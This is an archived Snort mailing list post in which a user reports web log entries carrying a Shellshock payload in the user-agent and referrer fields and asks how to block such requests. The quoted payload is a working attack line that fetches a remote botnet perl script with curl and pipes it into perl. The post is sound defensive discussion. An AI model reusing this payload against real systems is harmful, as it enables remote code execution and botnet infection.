Snort mailing list archives
Odd http requests in the logs
From: Richard Geddes <richardcgeddes () gmail com>
Date: Sun, 02 Nov 2014 23:23:51 -0500
Hello, I received a few (9) events in my web logs with the following fields: agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" downloaded index.png, and it turns out to be a base64 encoded perl script that has comments about a botnet. It seems to target apache. I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense, snort, and the snort rules are up-to-date snort seems to be passing these requests on to my web server, and it seems to me they should be blocked. I don't know enough about how web servers and log handlers process this data to determine if it's a threat. Is there a way to tell snort to block http requests with these fields? The source of the malicious file should probably be regex'd in case there are alternate sources of this file. Thanks, Richard ------------------------------------------------------------------------------ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!
Current thread:
- Odd http requests in the logs Richard Geddes (Nov 02)
- Re: Odd http requests in the logs waldo kitty (Nov 03)